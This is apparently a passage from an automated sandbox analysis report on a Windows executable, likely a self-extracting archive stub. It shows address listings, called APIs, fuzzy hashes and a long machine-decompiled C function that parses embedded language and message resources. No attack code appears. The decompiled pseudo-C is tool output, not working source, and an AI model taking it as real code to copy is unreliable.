                                                                                                                0x00ec6dc0
                                                                                                                0x00ec6dde
                                                                                                                0x00ec6de3
                                                                                                                0x00ec6de5
                                                                                                                0x00ec6de7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec6dcb
                                                                                                                0x00ec6dd0
                                                                                                                0x00ec6ddc
                                                                                                                0x00ec6ddd
                                                                                                                0x00ec6ddd
                                                                                                                0x00000000
                                                                                                                0x00ec6dde
                                                                                                                0x00ec6d6b
                                                                                                                0x00ec6a67
                                                                                                                0x00ec6a6d
                                                                                                                0x00ec6a74
                                                                                                                0x00ec6a78
                                                                                                                0x00ec6a7f
                                                                                                                0x00ec6a88
                                                                                                                0x00ec6a8a
                                                                                                                0x00ec6a90
                                                                                                                0x00ec6a90
                                                                                                                0x00ec6a9e
                                                                                                                0x00ec6aa2
                                                                                                                0x00ec6ab9
                                                                                                                0x00ec6abb
                                                                                                                0x00ec6ac1
                                                                                                                0x00ec6ac3
                                                                                                                0x00ec6ac3
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32), ref: 00EC6A55
                                                                                                                • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00EC6A67
                                                                                                                • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00EC6A98
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00EC6D45
                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EC6D61
                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EC6D73
                                                                                                                • ReadFile.KERNEL32(00000000,?,00007FFE,00EE77F8,00000000), ref: 00EC6D92
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00EC6DEA
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00EC6E00
                                                                                                                • CompareStringW.KERNELBASE(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00EC6E58
                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00EC6E81
                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00EC6EBB
                                                                                                                  • Part of subcall function 00EC69F6: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00EC6A11
                                                                                                                  • Part of subcall function 00EC69F6: LoadLibraryW.KERNELBASE(?,?,00EC5706,Crypt32.dll,00000000,00EC578A,?,?,00EC576C,?,?,?,?), ref: 00EC6A33
                                                                                                                • _swprintf.LIBCMT ref: 00EC6F2F
                                                                                                                • _swprintf.LIBCMT ref: 00EC6F7B
                                                                                                                  • Part of subcall function 00EC37E6: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00EC37F9
                                                                                                                • AllocConsole.KERNEL32 ref: 00EC6F83
                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00EC6F8D
                                                                                                                • AttachConsole.KERNEL32(00000000), ref: 00EC6F94
                                                                                                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00EC6FBA
                                                                                                                • WriteConsoleW.KERNEL32(00000000), ref: 00EC6FC1
                                                                                                                • Sleep.KERNEL32(00002710), ref: 00EC6FCC
                                                                                                                • FreeConsole.KERNEL32 ref: 00EC6FD2
                                                                                                                • ExitProcess.KERNEL32 ref: 00EC6FDA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                                                                                                • String ID: |$,x$,y$0z$0}$4{$8|$DXGIDebug.dll$Dx$Dy$Hz$L{$L|$L}$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$Xy$\x$`z$dwmapi.dll$d{$d|$d}$kernel32$py$tx$t{$uxtheme.dll$|z$||$x$y$z$|
                                                                                                                • API String ID: 1201351596-885416664
                                                                                                                • Opcode ID: 50be9a75956387b991734e43a3f5c69690d396c6f3d14ca722742cfe3871c846
                                                                                                                • Instruction ID: 455241d43109e2925d1574efba35a41a4087e4d8c2ea5ca77b8273dcc9cfb6c5
                                                                                                                • Opcode Fuzzy Hash: 50be9a75956387b991734e43a3f5c69690d396c6f3d14ca722742cfe3871c846
                                                                                                                • Instruction Fuzzy Hash: 02D15EB110C3C89ED3219F529D4AF9FBBE8ABC5704F10291DF1C9BA250D7B1864ACB56
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC3F91, Relevance: 30.3, APIs: 4, Strings: 13, Instructions: 555COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E00EC3F91(intOrPtr* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t199;
				void* _t200;
				WCHAR* _t201;
				void* _t206;
				signed int _t215;
				signed int _t218;
				signed int _t221;
				signed int _t231;
				void* _t232;
				void* _t235;
				signed int _t238;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t247;
				signed int _t251;
				signed int _t265;
				signed int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				void* _t277;
				signed int _t282;
				char* _t283;
				signed int _t287;
				short _t290;
				void* _t291;
				signed int _t297;
				signed int _t302;
				void* _t305;
				void* _t307;
				void* _t310;
				signed int _t319;
				unsigned int _t331;
				signed int _t333;
				unsigned int _t336;
				signed int _t339;
				void* _t346;
				signed int _t351;
				signed int _t354;
				signed int _t355;
				signed int _t360;
				signed int _t364;
				void* _t373;
				signed int _t375;
				signed int _t376;
				void* _t377;
				void* _t378;
				intOrPtr* _t379;
				signed int _t380;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				intOrPtr* _t390;
				signed int _t392;
				void* _t393;
				void* _t395;
				void* _t397;
				void* _t401;
				void* _t402;

				_t373 = __edx;
				E00ED3344();
				E00ED3370();
				_t199 = 0x5c;
				_push(0x42f4);
				_push( *((intOrPtr*)(_t393 + 8)));
				_t390 = __ecx;
				 *((intOrPtr*)(_t393 - 0x40)) = _t199;
				 *((intOrPtr*)(_t393 - 0x3c)) = __ecx;
				_t200 = E00ED49DE(__ecx);
				_t319 = 0;
				_t399 = _t200;
				_t201 = _t393 - 0x12dc;
				if(_t200 != 0) {
					E00EC674F(_t201,  *((intOrPtr*)(_t393 + 8)), 0x800);
				} else {
					GetModuleFileNameW(0, _t201, 0x800);
					 *((short*)(E00EC36C4(_t399, _t393 - 0x12dc))) = 0;
					E00EC6727(_t399, _t393 - 0x12dc,  *((intOrPtr*)(_t393 + 8)), 0x800);
				}
				E00EC1AA7(_t393 - 0x2300);
				_push(4);
				 *(_t393 - 4) = _t319;
				_push(_t393 - 0x12dc);
				if(E00EC1E40(_t393 - 0x2300, _t390) == 0) {
					L57:
					_t206 = E00EC1B02(_t393 - 0x2300, _t390); // executed
					 *[fs:0x0] =  *((intOrPtr*)(_t393 - 0xc));
					return _t206;
				} else {
					_t383 = _t319;
					_t401 =  *0xef14e4 - _t383; // 0x63
					if(_t401 <= 0) {
						L7:
						E00EDAAF0(_t319, _t383, _t390,  *_t390,  *((intOrPtr*)(_t390 + 4)), 4, E00EC3C00);
						E00EDAAF0(_t319, _t383, _t390,  *((intOrPtr*)(_t390 + 0x14)),  *((intOrPtr*)(_t390 + 0x18)), 4, E00EC3B60);
						_t397 = _t395 + 0x20;
						 *(_t393 - 0x15) = _t319;
						_t384 = _t383 | 0xffffffff;
						 *(_t393 - 0x2c) = _t319;
						 *(_t393 - 0x20) = _t384;
						while(_t384 == 0xffffffff) {
							 *(_t393 - 0x10) = E00EC2240();
							_t297 = E00EC2040(_t373, _t393 - 0x4300, 0x2000);
							 *(_t393 - 0x28) = _t297;
							_t387 = _t319;
							_t25 = _t297 - 0x10; // -16
							_t364 = _t25;
							 *(_t393 - 0x30) = _t364;
							if(_t364 < 0) {
								L25:
								_t298 =  *(_t393 - 0x10);
								_t384 =  *(_t393 - 0x20);
								L26:
								E00EC2130(_t393 - 0x2300, _t393, _t298 +  *(_t393 - 0x28) + 0xfffffff0, _t319, _t319);
								_t302 =  *(_t393 - 0x2c) + 1;
								 *(_t393 - 0x2c) = _t302;
								__eflags = _t302 - 0x100;
								if(_t302 < 0x100) {
									continue;
								}
								__eflags = _t384 - 0xffffffff;
								if(_t384 == 0xffffffff) {
									goto L57;
								}
								break;
							}
							L10:
							while(1) {
								if( *((char*)(_t393 + _t387 - 0x4300)) != 0x2a ||  *((char*)(_t393 + _t387 - 0x42ff)) != 0x2a) {
									L14:
									_t373 = 0x2a;
									if( *((intOrPtr*)(_t393 + _t387 - 0x4300)) != _t373) {
										L18:
										if( *((char*)(_t393 + _t387 - 0x4300)) != 0x52 ||  *((char*)(_t393 + _t387 - 0x42ff)) != 0x61) {
											L21:
											_t387 = _t387 + 1;
											if(_t387 >  *(_t393 - 0x30)) {
												goto L25;
											}
											_t297 =  *(_t393 - 0x28);
											continue;
										} else {
											_t305 = E00EDAF20(_t393 - 0x42fe + _t387, 0xee7644, 4);
											_t397 = _t397 + 0xc;
											if(_t305 == 0) {
												goto L57;
											}
											goto L21;
										}
									}
									_t369 = _t393 - 0x42fc + _t387;
									if( *((intOrPtr*)(_t393 - 0x42fc + _t387 - 2)) == _t373 && _t387 <= _t297 + 0xffffffe0) {
										_t307 = E00EDA803(_t369, L"*messages***", 0xb);
										_t397 = _t397 + 0xc;
										if(_t307 == 0) {
											 *(_t393 - 0x15) = 1;
											goto L24;
										}
									}
									goto L18;
								} else {
									_t310 = E00EDAF20(_t393 - 0x42fe + _t387, "*messages***", 0xb);
									_t397 = _t397 + 0xc;
									if(_t310 == 0) {
										L24:
										_t298 =  *(_t393 - 0x10);
										_t384 = _t387 +  *(_t393 - 0x10);
										 *(_t393 - 0x20) = _t384;
										goto L26;
									}
									_t297 =  *(_t393 - 0x28);
									goto L14;
								}
							}
						}
						asm("cdq");
						E00EC2130(_t393 - 0x2300, _t393, _t384, _t373, _t319);
						_push(0x200002);
						_t385 = E00EDA91B(_t393 - 0x2300);
						 *(_t393 - 0x1c) = _t385;
						__eflags = _t385;
						if(_t385 == 0) {
							goto L57;
						}
						_t331 = E00EC2040(_t373, _t385, 0x200000);
						 *(_t393 - 0x20) = _t331;
						__eflags =  *(_t393 - 0x15);
						if( *(_t393 - 0x15) == 0) {
							_push(2 + _t331 * 2);
							_t215 = E00EDA91B(_t331);
							 *(_t393 - 0x30) = _t215;
							__eflags = _t215;
							if(_t215 == 0) {
								goto L57;
							}
							_t333 =  *(_t393 - 0x20);
							 *(_t333 + _t385) = _t319;
							__eflags = _t333 + 1;
							E00EC7757(_t385, _t215, _t333 + 1);
							L00ED869E(_t385);
							_t385 =  *(_t393 - 0x30);
							_t336 =  *(_t393 - 0x20);
							 *(_t393 - 0x1c) = _t385;
							L33:
							_t218 = 0x100000;
							__eflags = _t336 - 0x100000;
							if(_t336 <= 0x100000) {
								_t218 = _t336;
							}
							 *((short*)(_t385 + _t218 * 2)) = 0;
							E00EC66F4(_t393 - 0x14c, 0xee764c, 0x64);
							_push(0x20002);
							_t221 = E00EDA91B(0);
							 *(_t393 - 0x10) = _t221;
							__eflags = _t221;
							if(_t221 != 0) {
								__eflags =  *(_t393 - 0x20);
								_t339 = _t319;
								_t374 = _t319;
								 *(_t393 - 0x14) = _t339;
								 *(_t393 - 0x84) = _t319;
								_t386 = _t319;
								 *(_t393 - 0x28) = _t319;
								if( *(_t393 - 0x20) <= 0) {
									L54:
									E00EC3ACA(_t390, _t374, _t393 - 0x84, _t221, _t339);
									L00ED869E( *(_t393 - 0x1c));
									L00ED869E( *(_t393 - 0x10));
									__eflags =  *((intOrPtr*)(_t390 + 0x2c)) - _t319;
									if( *((intOrPtr*)(_t390 + 0x2c)) <= _t319) {
										L56:
										 *0xef3db4 =  *((intOrPtr*)(_t390 + 0x28));
										E00EDAAF0(_t319, _t386, _t390,  *((intOrPtr*)(_t390 + 0x3c)),  *((intOrPtr*)(_t390 + 0x40)), 4, E00EC3CC0);
										E00EDAAF0(_t319, _t386, _t390,  *((intOrPtr*)(_t390 + 0x50)),  *((intOrPtr*)(_t390 + 0x54)), 4, E00EC3CF0);
										goto L57;
									} else {
										goto L55;
									}
									do {
										L55:
										E00EC467C(_t390 + 0x3c, _t319);
										E00EC467C(_t390 + 0x50, _t319);
										_t319 = _t319 + 1;
										__eflags = _t319 -  *((intOrPtr*)(_t390 + 0x2c));
									} while (_t319 <  *((intOrPtr*)(_t390 + 0x2c)));
									goto L56;
								}
								 *((intOrPtr*)(_t393 - 0x34)) = 0xd;
								 *((intOrPtr*)(_t393 - 0x38)) = 0xa;
								 *(_t393 - 0x30) = 9;
								do {
									_t231 =  *(_t393 - 0x1c);
									__eflags = _t386;
									if(_t386 == 0) {
										L80:
										_t375 =  *(_t231 + _t386 * 2) & 0x0000ffff;
										_t386 = _t386 + 1;
										__eflags = _t375;
										if(_t375 == 0) {
											break;
										}
										__eflags = _t375 -  *((intOrPtr*)(_t393 - 0x40));
										if(_t375 !=  *((intOrPtr*)(_t393 - 0x40))) {
											_t232 = 0xd;
											__eflags = _t375 - _t232;
											if(_t375 == _t232) {
												L99:
												E00EC3ACA(_t390,  *(_t393 - 0x28), _t393 - 0x84,  *(_t393 - 0x10), _t339);
												 *(_t393 - 0x84) = _t319;
												_t339 = _t319;
												 *(_t393 - 0x28) = _t319;
												L98:
												 *(_t393 - 0x14) = _t339;
												goto L52;
											}
											_t235 = 0xa;
											__eflags = _t375 - _t235;
											if(_t375 == _t235) {
												goto L99;
											}
											L96:
											__eflags = _t339 - 0x10000;
											if(_t339 >= 0x10000) {
												goto L52;
											}
											 *( *(_t393 - 0x10) + _t339 * 2) = _t375;
											_t339 = _t339 + 1;
											__eflags = _t339;
											goto L98;
										}
										__eflags = _t339 - 0x10000;
										if(_t339 >= 0x10000) {
											goto L52;
										}
										_t238 = ( *(_t231 + _t386 * 2) & 0x0000ffff) - 0x22;
										__eflags = _t238;
										if(_t238 == 0) {
											_push(0x22);
											L93:
											_pop(_t380);
											 *( *(_t393 - 0x10) + _t339 * 2) = _t380;
											_t339 = _t339 + 1;
											 *(_t393 - 0x14) = _t339;
											_t386 = _t386 + 1;
											goto L52;
										}
										_t240 = _t238 - 0x3a;
										__eflags = _t240;
										if(_t240 == 0) {
											_push(0x5c);
											goto L93;
										}
										_t241 = _t240 - 0x12;
										__eflags = _t241;
										if(_t241 == 0) {
											_push(0xa);
											goto L93;
										}
										_t242 = _t241 - 4;
										__eflags = _t242;
										if(_t242 == 0) {
											_push(0xd);
											goto L93;
										}
										__eflags = _t242 != 0;
										if(_t242 != 0) {
											goto L96;
										}
										_push(9);
										goto L93;
									}
									_t376 =  *(_t231 + _t386 * 2 - 2) & 0x0000ffff;
									__eflags = _t376 -  *((intOrPtr*)(_t393 - 0x34));
									if(_t376 ==  *((intOrPtr*)(_t393 - 0x34))) {
										L42:
										_t346 = 0x3a;
										__eflags =  *(_t231 + _t386 * 2) - _t346;
										if( *(_t231 + _t386 * 2) != _t346) {
											L71:
											 *(_t393 - 0x24) = _t231 + _t386 * 2;
											_t247 = E00EC657A( *(_t231 + _t386 * 2) & 0x0000ffff);
											__eflags = _t247;
											if(_t247 == 0) {
												L79:
												_t339 =  *(_t393 - 0x14);
												_t231 =  *(_t393 - 0x1c);
												goto L80;
											}
											E00EC674F(_t393 - 0x2dc,  *(_t393 - 0x24), 0x64);
											_t251 = E00EDA83D(_t393 - 0x2dc, L" \t,");
											 *(_t393 - 0x24) = _t251;
											__eflags = _t251;
											if(_t251 == 0) {
												goto L79;
											}
											 *_t251 = 0;
											E00EC799C(_t393 - 0x2dc, _t393 - 0x1b0, 0x64);
											E00EC66F4(_t393 - 0xe8, _t393 - 0x14c, 0x64);
											E00EC66CD(__eflags, _t393 - 0xe8, _t393 - 0x1b0, 0x64);
											E00EC66F4(_t393 - 0x84, _t393 - 0xe8, 0x32);
											_t265 = E00EDA931(_t319, 0, _t386, _t390, _t393 - 0xe8,  *_t390,  *((intOrPtr*)(_t390 + 4)), 4, E00EC3CA0);
											_t397 = _t397 + 0x14;
											__eflags = _t265;
											if(_t265 != 0) {
												_t271 =  *_t265 * 0xc;
												__eflags = _t271;
												_t169 = _t271 + 0xef1040; // 0x28b64ee0
												 *(_t393 - 0x28) =  *_t169;
											}
											_t386 = _t386 + ( *(_t393 - 0x24) - _t393 - 0x2dc >> 1) + 1;
											__eflags = _t386;
											_t270 =  *(_t393 - 0x1c);
											_t377 = 0x20;
											while(1) {
												_t351 =  *(_t270 + _t386 * 2) & 0x0000ffff;
												__eflags = _t351 - _t377;
												if(_t351 == _t377) {
													goto L78;
												}
												L77:
												__eflags = _t351 -  *(_t393 - 0x30);
												if(_t351 !=  *(_t393 - 0x30)) {
													L51:
													_t339 =  *(_t393 - 0x14);
													goto L52;
												}
												L78:
												_t386 = _t386 + 1;
												_t351 =  *(_t270 + _t386 * 2) & 0x0000ffff;
												__eflags = _t351 - _t377;
												if(_t351 == _t377) {
													goto L78;
												}
												goto L77;
											}
										}
										_t392 =  *(_t393 - 0x1c);
										_t273 = _t231 | 0xffffffff;
										__eflags = _t273;
										 *(_t393 - 0x2c) = _t273;
										 *(_t393 - 0x50) = L"STRINGS";
										 *(_t393 - 0x4c) = L"DIALOG";
										 *(_t393 - 0x48) = L"MENU";
										 *(_t393 - 0x44) = L"DIRECTION";
										 *(_t393 - 0x24) = _t319;
										do {
											_t94 = _t319 * 4; // 0xee7650
											_t274 = E00ED8683( *((intOrPtr*)(_t393 + _t94 - 0x50)));
											_t97 = _t319 * 4; // 0xee7650
											 *(_t393 - 0x24) = _t274;
											_t275 = E00EDA803(_t392 + 2 + _t386 * 2,  *((intOrPtr*)(_t393 + _t97 - 0x50)), _t274);
											_t397 = _t397 + 0x10;
											_t378 = 0x20;
											__eflags = _t275;
											if(_t275 != 0) {
												L47:
												_t276 =  *(_t393 - 0x2c);
												goto L48;
											}
											_t360 =  *(_t393 - 0x24) + _t386;
											__eflags =  *((intOrPtr*)(_t392 + 2 + _t360 * 2)) - _t378;
											if( *((intOrPtr*)(_t392 + 2 + _t360 * 2)) > _t378) {
												goto L47;
											}
											_t276 = _t319;
											_t386 = _t360 + 1;
											 *(_t393 - 0x2c) = _t276;
											L48:
											_t319 = _t319 + 1;
											__eflags = _t319 - 4;
										} while (_t319 < 4);
										_t390 =  *((intOrPtr*)(_t393 - 0x3c));
										_t319 = 0;
										__eflags = _t276;
										if(__eflags != 0) {
											_t231 =  *(_t393 - 0x1c);
											if(__eflags <= 0) {
												goto L71;
											} else {
												goto L59;
											}
											while(1) {
												L59:
												_t354 =  *(_t231 + _t386 * 2) & 0x0000ffff;
												__eflags = _t354 - _t378;
												if(_t354 == _t378) {
													goto L61;
												}
												L60:
												__eflags = _t354 -  *(_t393 - 0x30);
												if(_t354 !=  *(_t393 - 0x30)) {
													_t379 = _t231 + _t386 * 2;
													 *(_t393 - 0x24) = _t319;
													_t277 = 0x20;
													_t355 = _t319;
													__eflags =  *_t379 - _t277;
													if( *_t379 <= _t277) {
														L66:
														 *((short*)(_t393 + _t355 * 2 - 0x214)) = 0;
														E00EC799C(_t393 - 0x214, _t393 - 0xe8, 0x64);
														_t386 = _t386 +  *(_t393 - 0x24);
														_t282 =  *(_t393 - 0x2c);
														__eflags = _t282 - 3;
														if(_t282 != 3) {
															__eflags = _t282 - 1;
															_t283 = "$%s:";
															if(_t282 != 1) {
																_t283 = "@%s:";
															}
															E00EC49D6(_t393 - 0x14c, 0x64, _t283, _t393 - 0xe8);
															_t397 = _t397 + 0x10;
														} else {
															_t287 = E00EDA780(_t393 - 0x214, _t393 - 0x214, L"RTL");
															asm("sbb al, al");
															 *((char*)(_t390 + 0x64)) =  ~_t287 + 1;
														}
														goto L51;
													} else {
														goto L63;
													}
													while(1) {
														L63:
														__eflags = _t355 - 0x63;
														if(_t355 >= 0x63) {
															break;
														}
														_t290 =  *_t379;
														_t379 = _t379 + 2;
														 *((short*)(_t393 + _t355 * 2 - 0x214)) = _t290;
														_t355 = _t355 + 1;
														_t291 = 0x20;
														__eflags =  *_t379 - _t291;
														if( *_t379 > _t291) {
															continue;
														}
														break;
													}
													 *(_t393 - 0x24) = _t355;
													goto L66;
												}
												L61:
												_t386 = _t386 + 1;
												L59:
												_t354 =  *(_t231 + _t386 * 2) & 0x0000ffff;
												__eflags = _t354 - _t378;
												if(_t354 == _t378) {
													goto L61;
												}
												goto L60;
											}
										}
										E00EC66F4(_t393 - 0x14c, 0xee764c, 0x64);
										goto L51;
									}
									_t83 = _t393 - 0x38; // 0xa
									__eflags = _t376 -  *_t83;
									if(_t376 !=  *_t83) {
										goto L80;
									}
									goto L42;
									L52:
									__eflags = _t386 -  *(_t393 - 0x20);
								} while (_t386 <  *(_t393 - 0x20));
								_t221 =  *(_t393 - 0x10);
								_t374 =  *(_t393 - 0x28);
								goto L54;
							} else {
								L00ED869E(_t385);
								goto L57;
							}
						}
						_t336 = _t331 >> 1;
						 *(_t393 - 0x20) = _t336;
						goto L33;
					} else {
						goto L5;
					}
					do {
						L5:
						E00EC467C(_t390, _t383);
						E00EC467C(_t390 + 0x14, _t383);
						_t383 = _t383 + 1;
						_t402 = _t383 -  *0xef14e4; // 0x63
					} while (_t402 < 0);
					_t319 = 0;
					goto L7;
				}
			}






































































                                                                                                                0x00ec3f91
                                                                                                                0x00ec3f96
                                                                                                                0x00ec3fa0
                                                                                                                0x00ec3faa
                                                                                                                0x00ec3fab
                                                                                                                0x00ec3fac
                                                                                                                0x00ec3faf
                                                                                                                0x00ec3fb1
                                                                                                                0x00ec3fb4
                                                                                                                0x00ec3fb7
                                                                                                                0x00ec3fbd
                                                                                                                0x00ec3fbf
                                                                                                                0x00ec3fc2
                                                                                                                0x00ec3fc8
                                                                                                                0x00ec4004
                                                                                                                0x00ec3fca
                                                                                                                0x00ec3fd2
                                                                                                                0x00ec3fea
                                                                                                                0x00ec3ff4
                                                                                                                0x00ec3ff4
                                                                                                                0x00ec400f
                                                                                                                0x00ec4014
                                                                                                                0x00ec401c
                                                                                                                0x00ec401f
                                                                                                                0x00ec402d
                                                                                                                0x00ec43f0
                                                                                                                0x00ec43f6
                                                                                                                0x00ec4401
                                                                                                                0x00ec440b
                                                                                                                0x00ec4033
                                                                                                                0x00ec4033
                                                                                                                0x00ec4035
                                                                                                                0x00ec403b
                                                                                                                0x00ec4059
                                                                                                                0x00ec4065
                                                                                                                0x00ec4077
                                                                                                                0x00ec407c
                                                                                                                0x00ec407f
                                                                                                                0x00ec4082
                                                                                                                0x00ec4085
                                                                                                                0x00ec4088
                                                                                                                0x00ec408b
                                                                                                                0x00ec409f
                                                                                                                0x00ec40b4
                                                                                                                0x00ec40b9
                                                                                                                0x00ec40bc
                                                                                                                0x00ec40be
                                                                                                                0x00ec40be
                                                                                                                0x00ec40c1
                                                                                                                0x00ec40c6
                                                                                                                0x00ec4185
                                                                                                                0x00ec4185
                                                                                                                0x00ec4188
                                                                                                                0x00ec418b
                                                                                                                0x00ec419c
                                                                                                                0x00ec41a4
                                                                                                                0x00ec41a5
                                                                                                                0x00ec41a8
                                                                                                                0x00ec41ad
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec41b3
                                                                                                                0x00ec41b6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec41b6
                                                                                                                0x00000000
                                                                                                                0x00ec40cc
                                                                                                                0x00ec40d4
                                                                                                                0x00ec40ff
                                                                                                                0x00ec4101
                                                                                                                0x00ec410a
                                                                                                                0x00ec4135
                                                                                                                0x00ec413d
                                                                                                                0x00ec4169
                                                                                                                0x00ec4169
                                                                                                                0x00ec416d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec416f
                                                                                                                0x00000000
                                                                                                                0x00ec4149
                                                                                                                0x00ec4159
                                                                                                                0x00ec415e
                                                                                                                0x00ec4163
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec4163
                                                                                                                0x00ec413d
                                                                                                                0x00ec4112
                                                                                                                0x00ec4118
                                                                                                                0x00ec4129
                                                                                                                0x00ec412e
                                                                                                                0x00ec4133
                                                                                                                0x00ec4177
                                                                                                                0x00000000
                                                                                                                0x00ec4177
                                                                                                                0x00ec4133
                                                                                                                0x00000000
                                                                                                                0x00ec40e0
                                                                                                                0x00ec40f0
                                                                                                                0x00ec40f5
                                                                                                                0x00ec40fa
                                                                                                                0x00ec417b
                                                                                                                0x00ec417b
                                                                                                                0x00ec417e
                                                                                                                0x00ec4180
                                                                                                                0x00000000
                                                                                                                0x00ec4180
                                                                                                                0x00ec40fc
                                                                                                                0x00000000
                                                                                                                0x00ec40fc
                                                                                                                0x00ec40d4
                                                                                                                0x00ec40cc
                                                                                                                0x00ec41c5
                                                                                                                0x00ec41c8
                                                                                                                0x00ec41cd
                                                                                                                0x00ec41d7
                                                                                                                0x00ec41d9
                                                                                                                0x00ec41dd
                                                                                                                0x00ec41df
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec41f6
                                                                                                                0x00ec41fb
                                                                                                                0x00ec41fe
                                                                                                                0x00ec4200
                                                                                                                0x00ec4210
                                                                                                                0x00ec4211
                                                                                                                0x00ec4216
                                                                                                                0x00ec421a
                                                                                                                0x00ec421c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec4222
                                                                                                                0x00ec4225
                                                                                                                0x00ec4228
                                                                                                                0x00ec422c
                                                                                                                0x00ec4232
                                                                                                                0x00ec4237
                                                                                                                0x00ec423b
                                                                                                                0x00ec423e
                                                                                                                0x00ec4241
                                                                                                                0x00ec4241
                                                                                                                0x00ec4246
                                                                                                                0x00ec4248
                                                                                                                0x00ec424a
                                                                                                                0x00ec424a
                                                                                                                0x00ec4250
                                                                                                                0x00ec4260
                                                                                                                0x00ec4265
                                                                                                                0x00ec426a
                                                                                                                0x00ec426f
                                                                                                                0x00ec4273
                                                                                                                0x00ec4275
                                                                                                                0x00ec4283
                                                                                                                0x00ec4287
                                                                                                                0x00ec4289
                                                                                                                0x00ec428b
                                                                                                                0x00ec428e
                                                                                                                0x00ec4294
                                                                                                                0x00ec4296
                                                                                                                0x00ec4299
                                                                                                                0x00ec4381
                                                                                                                0x00ec438d
                                                                                                                0x00ec4395
                                                                                                                0x00ec439d
                                                                                                                0x00ec43a4
                                                                                                                0x00ec43a7
                                                                                                                0x00ec43c1
                                                                                                                0x00ec43ce
                                                                                                                0x00ec43d6
                                                                                                                0x00ec43e8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec43a9
                                                                                                                0x00ec43a9
                                                                                                                0x00ec43ad
                                                                                                                0x00ec43b6
                                                                                                                0x00ec43bb
                                                                                                                0x00ec43bc
                                                                                                                0x00ec43bc
                                                                                                                0x00000000
                                                                                                                0x00ec43a9
                                                                                                                0x00ec429f
                                                                                                                0x00ec42a6
                                                                                                                0x00ec42ad
                                                                                                                0x00ec42b4
                                                                                                                0x00ec42b4
                                                                                                                0x00ec42b7
                                                                                                                0x00ec42b9
                                                                                                                0x00ec45cc
                                                                                                                0x00ec45cc
                                                                                                                0x00ec45d0
                                                                                                                0x00ec45d1
                                                                                                                0x00ec45d4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec45da
                                                                                                                0x00ec45de
                                                                                                                0x00ec4630
                                                                                                                0x00ec4631
                                                                                                                0x00ec4634
                                                                                                                0x00ec465a
                                                                                                                0x00ec466a
                                                                                                                0x00ec466f
                                                                                                                0x00ec4675
                                                                                                                0x00ec4677
                                                                                                                0x00ec4652
                                                                                                                0x00ec4652
                                                                                                                0x00000000
                                                                                                                0x00ec4652
                                                                                                                0x00ec4638
                                                                                                                0x00ec4639
                                                                                                                0x00ec463c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec463e
                                                                                                                0x00ec463e
                                                                                                                0x00ec4644
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec464d
                                                                                                                0x00ec4651
                                                                                                                0x00ec4651
                                                                                                                0x00000000
                                                                                                                0x00ec4651
                                                                                                                0x00ec45e0
                                                                                                                0x00ec45e6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec45f0
                                                                                                                0x00ec45f0
                                                                                                                0x00ec45f3
                                                                                                                0x00ec461a
                                                                                                                0x00ec461c
                                                                                                                0x00ec461f
                                                                                                                0x00ec4620
                                                                                                                0x00ec4624
